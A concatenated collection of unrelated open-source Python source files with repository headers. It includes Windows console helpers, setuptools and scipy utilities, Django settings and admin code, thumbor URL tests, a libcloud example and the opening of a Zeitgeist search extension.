return _SetConsoleTextAttribute(handle, attrs)
def SetConsoleCursorPosition(stream_id, position, adjust=True):
position = COORD(*position)
# If the position is out of range, do nothing.
if position.Y <= 0 or position.X <= 0:
return
# Adjust for Windows' SetConsoleCursorPosition:
# 1. being 0-based, while ANSI is 1-based.
# 2. expecting (x,y), while ANSI uses (y,x).
adjusted_position = COORD(position.Y - 1, position.X - 1)
if adjust:
# Adjust for viewport's scroll position
sr = GetConsoleScreenBufferInfo(STDOUT).srWindow
adjusted_position.Y += sr.Top
adjusted_position.X += sr.Left
# Resume normal processing
handle = handles[stream_id]
return _SetConsoleCursorPosition(handle, adjusted_position)
def FillConsoleOutputCharacter(stream_id, char, length, start):
handle = handles[stream_id]
char = c_char(char.encode())
length = wintypes.DWORD(length)
num_written = wintypes.DWORD(0)
# Note that this is hard-coded for ANSI (vs wide) bytes.
success = _FillConsoleOutputCharacterA(
handle, char, length, start, byref(num_written))
return num_written.value
def FillConsoleOutputAttribute(stream_id, attr, length, start):
''' FillConsoleOutputAttribute( hConsole, csbi.wAttributes, dwConSize, coordScreen, &cCharsWritten )'''
handle = handles[stream_id]
attribute = wintypes.WORD(attr)
length = wintypes.DWORD(length)
num_written = wintypes.DWORD(0)
# Note that this is hard-coded for ANSI (vs wide) bytes.
return _FillConsoleOutputAttribute(
handle, attribute, length, start, byref(num_written))
def SetConsoleTitle(title):
return _SetConsoleTitleW(title)
|
axbaretto/beam | refs/heads/master | sdks/python/.tox/docs/lib/python2.7/site-packages/setuptools/py36compat.py | 313 | import sys
from distutils.errors import DistutilsOptionError
from distutils.util import strtobool
from distutils.debug import DEBUG
class Distribution_parse_config_files:
"""
Mix-in providing forward-compatibility for functionality to be
included by default on Python 3.7.
Do not edit the code in this class except to update functionality
as implemented in distutils.
"""
def parse_config_files(self, filenames=None):
from configparser import ConfigParser
# Ignore install directory options if we have a venv
if sys.prefix != sys.base_prefix:
ignore_options = [
'install-base', 'install-platbase', 'install-lib',
'install-platlib', 'install-purelib', 'install-headers',
'install-scripts', 'install-data', 'prefix', 'exec-prefix',
'home', 'user', 'root']
else:
ignore_options = []
ignore_options = frozenset(ignore_options)
if filenames is None:
filenames = self.find_config_files()
if DEBUG:
self.announce("Distribution.parse_config_files():")
parser = ConfigParser(interpolation=None)
for filename in filenames:
if DEBUG:
self.announce(" reading %s" % filename)
parser.read(filename)
for section in parser.sections():
options = parser.options(section)
opt_dict = self.get_option_dict(section)
for opt in options:
if opt != '__name__' and opt not in ignore_options:
val = parser.get(section,opt)
opt = opt.replace('-', '_')
opt_dict[opt] = (filename, val)
# Make the ConfigParser forget everything (so we retain
# the original filenames that options come from)
parser.__init__()
# If there was a "global" section in the config file, use it
# to set Distribution options.
if 'global' in self.command_options:
for (opt, (src, val)) in self.command_options['global'].items():
alias = self.negative_opt.get(opt)
try:
if alias:
setattr(self, alias, not strtobool(val))
elif opt in ('verbose', 'dry_run'): # ugh!
setattr(self, opt, strtobool(val))
else:
setattr(self, opt, val)
except ValueError as msg:
raise DistutilsOptionError(msg)
if sys.version_info < (3,):
# Python 2 behavior is sufficient
class Distribution_parse_config_files:
pass
if False:
# When updated behavior is available upstream,
# disable override here.
class Distribution_parse_config_files:
pass
|
BT-fgarbely/partner-contact | refs/heads/8.0 | partner_helper/__init__.py | 35 | # -*- coding: utf-8 -*-
##############################################################################
#
# Author: Sébastien BEAU <sebastien.beau@akretion.com>
# Copyright 2014 Akretion
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from . import partner # noqa
|
santhoshtr/silpa | refs/heads/master | src/silpa/modules/fortune/fortune.py | 3 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Fortune program
# Copyright 2008 Santhosh Thottingal <santhosh.thottingal@gmail.com>
# http://www.smc.org.in
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# If you find any bugs or have any suggestions email: santhosh.thottingal@gmail.com
import os,random
import codecs
from common import *
class Fortune(SilpaModule):
def __init__(self):
self.template=os.path.join(os.path.dirname(__file__), 'fortune.html')
self.response = SilpaResponse(self.template)
def fortunes(self, infile, pattern=None):
""" Yield fortunes as lists of lines """
quotes = []
results = []
quote = ''
for line in infile:
#line = unicode(line)
if line == "%\n":
quotes.append(quote)
quote = ''
else:
quote += line
if pattern:
for quote in quotes:
if quote.find(pattern) >= 0:
results.append(quote)
return results
return quotes
@ServiceMethod
def fortune(self, database, pattern=None ):
filename = os.path.join(os.path.dirname(__file__), 'database', database+".dic")
fortunes_file = codecs. open(filename,encoding='utf-8', errors='ignore')
""" Pick a random fortune from a file """
fortunes_list = self.fortunes(fortunes_file, pattern)
chosen = ""
if fortunes_list:
chosen = random.choice(fortunes_list)
return "".join(chosen)
def get_module_name(self):
return "Fortune Cookies"
def get_info(self):
return "Get/Search a random quote "
def getInstance():
return Fortune()
|
AutorestCI/azure-sdk-for-python | refs/heads/master | azure-mgmt-containerinstance/azure/mgmt/containerinstance/models/container_instance_management_client_enums.py | 2 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from enum import Enum
class ContainerNetworkProtocol(Enum):
tcp = "TCP"
udp = "UDP"
class ContainerGroupRestartPolicy(Enum):
always = "Always"
on_failure = "OnFailure"
never = "Never"
class ContainerGroupNetworkProtocol(Enum):
tcp = "TCP"
udp = "UDP"
class OperatingSystemTypes(Enum):
windows = "Windows"
linux = "Linux"
class ContainerInstanceOperationsOrigin(Enum):
user = "User"
system = "System"
|
adeboisanger/thumbor | refs/heads/master | tests/test_url.py | 4 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# thumbor imaging service
# https://github.com/thumbor/thumbor/wiki
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 globo.com timehome@corp.globo.com
from unittest import TestCase
from preggy import expect
from thumbor.url import Url
class UrlTestCase(TestCase):
def setUp(self):
Url.compiled_regex = None
def test_can_get_regex(self):
regex = Url.regex()
expect(regex).to_equal(
'/?(?:(?:(?P<unsafe>unsafe)|(?P<hash>.+?))/)?(?:(?P<debug>debug)/)?(?:(?P<meta>meta)/)?'
'(?:(?P<trim>trim(?::(?:top-left|bottom-right))?(?::\\d+)?)/)?'
'(?:(?P<crop_left>\\d+)x(?P<crop_top>\\d+):(?P<crop_right>\\d+)x(?P<crop_bottom>\\d+)/)?'
'(?:(?P<adaptive>adaptive-)?(?P<full>full-)?(?P<fit_in>fit-in)/)?(?:(?P<horizontal_flip>-)?'
'(?P<width>(?:\\d+|orig))?x(?P<vertical_flip>-)?(?P<height>(?:\\d+|orig))?/)?'
'(?:(?P<halign>left|right|center)/)?(?:(?P<valign>top|bottom|middle)/)?'
'(?:(?P<smart>smart)/)?(?:filters:(?P<filters>.+?\\))/)?(?P<image>.+)'
)
def test_can_get_regex_without_unsafe(self):
regex = Url.regex(False)
expect(regex).to_equal(
'/?(?:(?P<debug>debug)/)?(?:(?P<meta>meta)/)?'
'(?:(?P<trim>trim(?::(?:top-left|bottom-right))?(?::\\d+)?)/)?'
'(?:(?P<crop_left>\\d+)x(?P<crop_top>\\d+):(?P<crop_right>\\d+)x(?P<crop_bottom>\\d+)/)?'
'(?:(?P<adaptive>adaptive-)?(?P<full>full-)?(?P<fit_in>fit-in)/)?(?:(?P<horizontal_flip>-)?'
'(?P<width>(?:\\d+|orig))?x(?P<vertical_flip>-)?(?P<height>(?:\\d+|orig))?/)?'
'(?:(?P<halign>left|right|center)/)?(?:(?P<valign>top|bottom|middle)/)?'
'(?:(?P<smart>smart)/)?(?:filters:(?P<filters>.+?\\))/)?(?P<image>.+)'
)
def test_parsing_invalid_url(self):
expect(Url.compiled_regex).to_be_null()
url = ""
expect(Url.parse_decrypted(url)).to_be_null()
def test_parsing_complete_url(self):
url = '/debug/meta/trim/300x200:400x500/adaptive-full-fit-in/-300x-400/' \
'left/top/smart/filters:brightness(100)/some/image.jpg'
expected = {
'trim': 'trim',
'full': True,
'halign': 'left',
'fit_in': True,
'vertical_flip': True,
'image': 'some/image.jpg',
'crop': {'top': 200, 'right': 400, 'bottom': 500, 'left': 300},
'height': 400,
'width': 300,
'meta': True,
'horizontal_flip': True,
'filters': 'brightness(100)',
'valign': 'top',
'debug': True,
'adaptive': True,
'smart': True,
}
result = Url.parse_decrypted(url)
expect(result).not_to_be_null()
expect(result).to_be_like(expected)
# do it again to use compiled regex
result = Url.parse_decrypted(url)
expect(result).not_to_be_null()
expect(result).to_be_like(expected)
def test_can_generate_url(self):
url = Url.generate_options(
debug=True,
width=300,
height=200,
smart=True,
meta=True,
trim=True,
adaptive=True,
full=True,
fit_in=True,
horizontal_flip=True,
vertical_flip=True,
halign='left',
valign='top',
crop_left=100,
crop_top=100,
crop_right=400,
crop_bottom=400,
filters='brightness(100)'
)
expect(url).to_equal(
'debug/meta/trim/100x100:400x400/adaptive-full-fit-in/-300x-200/left/top/smart/filters:brightness(100)'
)
def test_can_generate_url_with_defaults(self):
url = Url.generate_options()
expect(url).to_be_empty()
def test_can_generate_url_with_fitin(self):
url = Url.generate_options(fit_in=True, adaptive=False, full=False)
expect(url).to_equal('fit-in')
def test_can_generate_url_with_custom_trim(self):
url = Url.generate_options(
debug=True,
width=300,
height=200,
smart=True,
meta=True,
trim='300x200',
adaptive=True,
full=True,
fit_in=True,
horizontal_flip=True,
vertical_flip=True,
halign='left',
valign='top',
crop_left=100,
crop_top=100,
crop_right=400,
crop_bottom=400,
filters='brightness(100)'
)
expect(url).to_equal(
'debug/meta/trim:300x200/100x100:400x400/adaptive-full-fit-in/-300x-200/left/top/smart/filters:brightness(100)'
)
def test_can_encode_url(self):
url = '/tes+ t:?%=&()~",\'$'
expect(Url.encode_url(url)).to_equal('/tes%2B%20t:?%=&()~",\'$')
|
samuelchong/libcloud | refs/heads/trunk | docs/examples/compute/ecs/ex_list_security_groups.py | 29 | import pprint
from libcloud.compute.providers import get_driver
from libcloud.compute.types import Provider
ECSDriver = get_driver(Provider.ALIYUN_ECS)
region = 'cn-hangzhou'
access_key_id = 'CHANGE IT'
access_key_secret = 'CHANGE IT'
driver = ECSDriver(access_key_id, access_key_secret, region=region)
sec_groups = driver.ex_list_security_groups()
pprint.pprint(sec_groups)
|
bioinformatics-ua/montra | refs/heads/master | emif/questionnaire/admin.py | 2 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2014 Universidade de Aveiro, DETI/IEETA, Bioinformatics Group - http://bioinformatics.ua.pt/
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.contrib import admin
from models import *
from django.utils.safestring import mark_safe
class ChoiceAdmin(admin.ModelAdmin):
list_display = ['sortid', 'text', 'value', 'question']
class ChoiceInline(admin.TabularInline):
ordering = ['sortid']
model = Choice
extra = 5
def markall_ignoremlt(modeladmin, request, queryset):
for qset in queryset:
for question in qset.questions():
print question
question.mlt_ignore = True
question.save()
markall_ignoremlt.short_description = "Mark all questions has ignored from MLT"
def markall_noignoremlt(modeladmin, request, queryset):
for qset in queryset:
for question in qset.questions():
question.mlt_ignore = False
question.save()
markall_noignoremlt.short_description = "Mark all questions has not ignored from MLT"
class QuestionSetAdmin(admin.ModelAdmin):
#ordering = ['questionnaire', 'sortid', ]
list_filter = ['questionnaire', ]
list_display = ['questionnaire', 'heading', 'sortid', ]
list_editable = ['sortid', ]
actions = [markall_ignoremlt, markall_noignoremlt]
class QuestionAdmin(admin.ModelAdmin):
ordering = ['questionset__questionnaire', 'questionset', 'number']
inlines = [ChoiceInline]
def changelist_view(self, request, extra_context=None):
"Hack to have Questionnaire list accessible for custom changelist template"
if not extra_context:
extra_context = {}
extra_context['questionnaires'] = Questionnaire.objects.all().order_by('name')
return super(QuestionAdmin, self).changelist_view(request, extra_context)
def clone_questionnaires(modeladmin, request, queryset):
for query in queryset:
query.copy()
clone_questionnaires.short_description = "Clone selected questionnaires"
class QuestionnaireAdmin(admin.ModelAdmin):
actions = [clone_questionnaires]
class QuestionnaireWizardAdmin(admin.ModelAdmin):
list_display = ['questionnaire', 'user', 'removed']
admin.site.register(Questionnaire, QuestionnaireAdmin)
admin.site.register(Question, QuestionAdmin)
admin.site.register(QuestionSet, QuestionSetAdmin)
admin.site.register(QuestionnaireWizard, QuestionnaireWizardAdmin)
|
MariusLauge/dnd_tracker | refs/heads/master | dnd_tracker/settings.py | 1 | """
Django settings for dnd_tracker project.
Generated by 'django-admin startproject' using Django 1.11.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'juchgjo=*=80&i=5xw18eg0-43h&wjms1wvi4j2u#8_uq0&1kc'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'frag_tracker.apps.FragTrackerConfig'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'dnd_tracker.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['./templates',],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'dnd_tracker.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Copenhagen'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
# Redirect to home URL after login (Default redirects to /accounts/profile/)
LOGIN_REDIRECT_URL = '/characterlistview' |
endolith/scipy | refs/heads/master | scipy/_lib/decorator.py | 12 | # ######################### LICENSE ############################ #
# Copyright (c) 2005-2015, Michele Simionato
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# Redistributions in bytecode form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDERS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
# DAMAGE.
"""
Decorator module, see https://pypi.python.org/pypi/decorator
for the documentation.
"""
import re
import sys
import inspect
import operator
import itertools
import collections
from inspect import getfullargspec
__version__ = '4.0.5'
def get_init(cls):
return cls.__init__
# getargspec has been deprecated in Python 3.5
ArgSpec = collections.namedtuple(
'ArgSpec', 'args varargs varkw defaults')
def getargspec(f):
"""A replacement for inspect.getargspec"""
spec = getfullargspec(f)
return ArgSpec(spec.args, spec.varargs, spec.varkw, spec.defaults)
DEF = re.compile(r'\s*def\s*([_\w][_\w\d]*)\s*\(')
# basic functionality
class FunctionMaker:
"""
An object with the ability to create functions with a given signature.
It has attributes name, doc, module, signature, defaults, dict, and
methods update and make.
"""
# Atomic get-and-increment provided by the GIL
_compile_count = itertools.count()
def __init__(self, func=None, name=None, signature=None,
defaults=None, doc=None, module=None, funcdict=None):
self.shortsignature = signature
if func:
# func can be a class or a callable, but not an instance method
self.name = func.__name__
if self.name == '<lambda>': # small hack for lambda functions
self.name = '_lambda_'
self.doc = func.__doc__
self.module = func.__module__
if inspect.isfunction(func):
argspec = getfullargspec(func)
self.annotations = getattr(func, '__annotations__', {})
for a in ('args', 'varargs', 'varkw', 'defaults', 'kwonlyargs',
'kwonlydefaults'):
setattr(self, a, getattr(argspec, a))
for i, arg in enumerate(self.args):
setattr(self, 'arg%d' % i, arg)
allargs = list(self.args)
allshortargs = list(self.args)
if self.varargs:
allargs.append('*' + self.varargs)
allshortargs.append('*' + self.varargs)
elif self.kwonlyargs:
allargs.append('*') # single star syntax
for a in self.kwonlyargs:
allargs.append('%s=None' % a)
allshortargs.append('%s=%s' % (a, a))
if self.varkw:
allargs.append('**' + self.varkw)
allshortargs.append('**' + self.varkw)
self.signature = ', '.join(allargs)
self.shortsignature = ', '.join(allshortargs)
self.dict = func.__dict__.copy()
# func=None happens when decorating a caller
if name:
self.name = name
if signature is not None:
self.signature = signature
if defaults:
self.defaults = defaults
if doc:
self.doc = doc
if module:
self.module = module
if funcdict:
self.dict = funcdict
# check existence required attributes
assert hasattr(self, 'name')
if not hasattr(self, 'signature'):
raise TypeError('You are decorating a non-function: %s' % func)
def update(self, func, **kw):
"Update the signature of func with the data in self"
func.__name__ = self.name
func.__doc__ = getattr(self, 'doc', None)
func.__dict__ = getattr(self, 'dict', {})
func.__defaults__ = getattr(self, 'defaults', ())
func.__kwdefaults__ = getattr(self, 'kwonlydefaults', None)
func.__annotations__ = getattr(self, 'annotations', None)
try:
frame = sys._getframe(3)
except AttributeError: # for IronPython and similar implementations
callermodule = '?'
else:
callermodule = frame.f_globals.get('__name__', '?')
func.__module__ = getattr(self, 'module', callermodule)
func.__dict__.update(kw)
def make(self, src_templ, evaldict=None, addsource=False, **attrs):
"Make a new function from a given template and update the signature"
src = src_templ % vars(self) # expand name and signature
evaldict = evaldict or {}
mo = DEF.match(src)
if mo is None:
raise SyntaxError('not a valid function template\n%s' % src)
name = mo.group(1) # extract the function name
names = set([name] + [arg.strip(' *') for arg in
self.shortsignature.split(',')])
for n in names:
if n in ('_func_', '_call_'):
raise NameError('%s is overridden in\n%s' % (n, src))
if not src.endswith('\n'): # add a newline just for safety
src += '\n' # this is needed in old versions of Python
# Ensure each generated function has a unique filename for profilers
# (such as cProfile) that depend on the tuple of (<filename>,
# <definition line>, <function name>) being unique.
filename = '<decorator-gen-%d>' % (next(self._compile_count),)
try:
code = compile(src, filename, 'single')
exec(code, evaldict)
except: # noqa: E722
print('Error in generated code:', file=sys.stderr)
print(src, file=sys.stderr)
raise
func = evaldict[name]
if addsource:
attrs['__source__'] = src
self.update(func, **attrs)
return func
@classmethod
def create(cls, obj, body, evaldict, defaults=None,
doc=None, module=None, addsource=True, **attrs):
"""
Create a function from the strings name, signature, and body.
evaldict is the evaluation dictionary. If addsource is true, an
attribute __source__ is added to the result. The attributes attrs
are added, if any.
"""
if isinstance(obj, str): # "name(signature)"
name, rest = obj.strip().split('(', 1)
signature = rest[:-1] # strip a right parens
func = None
else: # a function
name = None
signature = None
func = obj
self = cls(func, name, signature, defaults, doc, module)
ibody = '\n'.join(' ' + line for line in body.splitlines())
return self.make('def %(name)s(%(signature)s):\n' + ibody,
evaldict, addsource, **attrs)
def decorate(func, caller):
"""
decorate(func, caller) decorates a function using a caller.
"""
evaldict = func.__globals__.copy()
evaldict['_call_'] = caller
evaldict['_func_'] = func
fun = FunctionMaker.create(
func, "return _call_(_func_, %(shortsignature)s)",
evaldict, __wrapped__=func)
if hasattr(func, '__qualname__'):
fun.__qualname__ = func.__qualname__
return fun
def decorator(caller, _func=None):
"""decorator(caller) converts a caller function into a decorator"""
if _func is not None: # return a decorated function
# this is obsolete behavior; you should use decorate instead
return decorate(_func, caller)
# else return a decorator function
if inspect.isclass(caller):
name = caller.__name__.lower()
callerfunc = get_init(caller)
doc = 'decorator(%s) converts functions/generators into ' \
'factories of %s objects' % (caller.__name__, caller.__name__)
elif inspect.isfunction(caller):
if caller.__name__ == '<lambda>':
name = '_lambda_'
else:
name = caller.__name__
callerfunc = caller
doc = caller.__doc__
else: # assume caller is an object with a __call__ method
name = caller.__class__.__name__.lower()
callerfunc = caller.__call__.__func__
doc = caller.__call__.__doc__
evaldict = callerfunc.__globals__.copy()
evaldict['_call_'] = caller
evaldict['_decorate_'] = decorate
return FunctionMaker.create(
'%s(func)' % name, 'return _decorate_(func, _call_)',
evaldict, doc=doc, module=caller.__module__,
__wrapped__=caller)
# ####################### contextmanager ####################### #
try: # Python >= 3.2
from contextlib import _GeneratorContextManager
except ImportError: # Python >= 2.5
from contextlib import GeneratorContextManager as _GeneratorContextManager
class ContextManager(_GeneratorContextManager):
def __call__(self, func):
"""Context manager decorator"""
return FunctionMaker.create(
func, "with _self_: return _func_(%(shortsignature)s)",
dict(_self_=self, _func_=func), __wrapped__=func)
init = getfullargspec(_GeneratorContextManager.__init__)
n_args = len(init.args)
if n_args == 2 and not init.varargs: # (self, genobj) Python 2.7
def __init__(self, g, *a, **k):
return _GeneratorContextManager.__init__(self, g(*a, **k))
ContextManager.__init__ = __init__
elif n_args == 2 and init.varargs: # (self, gen, *a, **k) Python 3.4
pass
elif n_args == 4: # (self, gen, args, kwds) Python 3.5
def __init__(self, g, *a, **k):
return _GeneratorContextManager.__init__(self, g, a, k)
ContextManager.__init__ = __init__
contextmanager = decorator(ContextManager)
# ############################ dispatch_on ############################ #
def append(a, vancestors):
"""
Append ``a`` to the list of the virtual ancestors, unless it is already
included.
"""
add = True
for j, va in enumerate(vancestors):
if issubclass(va, a):
add = False
break
if issubclass(a, va):
vancestors[j] = a
add = False
if add:
vancestors.append(a)
# inspired from simplegeneric by P.J. Eby and functools.singledispatch
def dispatch_on(*dispatch_args):
"""
Factory of decorators turning a function into a generic function
dispatching on the given arguments.
"""
assert dispatch_args, 'No dispatch args passed'
dispatch_str = '(%s,)' % ', '.join(dispatch_args)
def check(arguments, wrong=operator.ne, msg=''):
"""Make sure one passes the expected number of arguments"""
if wrong(len(arguments), len(dispatch_args)):
raise TypeError('Expected %d arguments, got %d%s' %
(len(dispatch_args), len(arguments), msg))
def gen_func_dec(func):
"""Decorator turning a function into a generic function"""
# first check the dispatch arguments
argset = set(getfullargspec(func).args)
if not set(dispatch_args) <= argset:
raise NameError('Unknown dispatch arguments %s' % dispatch_str)
typemap = {}
def vancestors(*types):
"""
Get a list of sets of virtual ancestors for the given types
"""
check(types)
ras = [[] for _ in range(len(dispatch_args))]
for types_ in typemap:
for t, type_, ra in zip(types, types_, ras):
if issubclass(t, type_) and type_ not in t.__mro__:
append(type_, ra)
return [set(ra) for ra in ras]
def ancestors(*types):
"""
Get a list of virtual MROs, one for each type
"""
check(types)
lists = []
for t, vas in zip(types, vancestors(*types)):
n_vas = len(vas)
if n_vas > 1:
raise RuntimeError(
'Ambiguous dispatch for %s: %s' % (t, vas))
elif n_vas == 1:
va, = vas
mro = type('t', (t, va), {}).__mro__[1:]
else:
mro = t.__mro__
lists.append(mro[:-1]) # discard t and object
return lists
def register(*types):
"""
Decorator to register an implementation for the given types
"""
check(types)
def dec(f):
check(getfullargspec(f).args, operator.lt, ' in ' + f.__name__)
typemap[types] = f
return f
return dec
def dispatch_info(*types):
"""
An utility to introspect the dispatch algorithm
"""
check(types)
lst = [tuple(a.__name__ for a in anc)
for anc in itertools.product(*ancestors(*types))]
return lst
def _dispatch(dispatch_args, *args, **kw):
types = tuple(type(arg) for arg in dispatch_args)
try: # fast path
f = typemap[types]
except KeyError:
pass
else:
return f(*args, **kw)
combinations = itertools.product(*ancestors(*types))
next(combinations) # the first one has been already tried
for types_ in combinations:
f = typemap.get(types_)
if f is not None:
return f(*args, **kw)
# else call the default implementation
return func(*args, **kw)
return FunctionMaker.create(
func, 'return _f_(%s, %%(shortsignature)s)' % dispatch_str,
dict(_f_=_dispatch), register=register, default=func,
typemap=typemap, vancestors=vancestors, ancestors=ancestors,
dispatch_info=dispatch_info, __wrapped__=func)
gen_func_dec.__name__ = 'dispatch_on' + dispatch_str
return gen_func_dec
|
JonNRb/physics506 | refs/heads/master | src/fresnel/f_ratio.py | 1 | txt = None
with open('f_data.txt') as f:
txt = f.read()
lines = [i for i in txt.split('\n') if i]
data = [[int(i.strip()) for i in j.split('\t')] for j in lines]
import math
d2r = lambda ang: ang * math.pi / 180
ratio = lambda ang_2, ang_1: math.sin(d2r(ang_1)) / math.sin(d2r(ang_2))
for point in data:
print(ratio(*point))
print('avg:', sum(ratio(*point) for point in data) / len(lines))
|
pvagner/orca | refs/heads/master | src/orca/scripts/apps/Banshee/__init__.py | 36 | from .script import Script
|
ustramooner/zeitgeist-lucenepp | refs/heads/clucene | _zeitgeist/engine/extensions/fts.py | 1 | # -.- coding: utf-8 -.-
# Zeitgeist
#
# Copyright © 2009 Mikkel Kamstrup Erlandsen <mikkel.kamstrup@gmail.com>
# Copyright © 2010 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
# TODO
#
# - Delete events hook
# - ? Filter on StorageState
# - Throttle IO and CPU where possible
import os, sys
import time
import pickle
import dbus
import dbus.service
from xdg import BaseDirectory
from xdg.DesktopEntry import DesktopEntry, xdg_data_dirs
import logging
import subprocess
from xml.dom import minidom
import lucene
import os
from Queue import Queue, Empty
import threading
from urllib import quote as url_escape, unquote as url_unescape
import gobject, gio
from zeitgeist.datamodel import Symbol, StorageState, ResultType, TimeRange, NULL_EVENT, NEGATION_OPERATOR
from _zeitgeist.engine.datamodel import Event, Subject
from _zeitgeist.engine.extension import Extension
from _zeitgeist.engine import constants
from zeitgeist.datamodel import Interpretation, Manifestation
logging.basicConfig(level=logging.DEBUG)
log = logging.getLogger("zeitgeist.fts")
INDEX_FILE = os.path.join(constants.DATA_PATH, "fts.clucene.index")
FTS_DBUS_OBJECT_PATH = "/org/gnome/zeitgeist/index/activity"
FTS_DBUS_INTERFACE = "org.gnome.zeitgeist.Index"
FILTER_PREFIX_EVENT_INTERPRETATION = "ZGEI"
FILTER_PREFIX_EVENT_MANIFESTATION = "ZGEM"
FILTER_PREFIX_ACTOR = "ZGA"
FILTER_PREFIX_SUBJECT_URI = "ZGSU"
FILTER_PREFIX_SUBJECT_INTERPRETATION = "ZGSI"
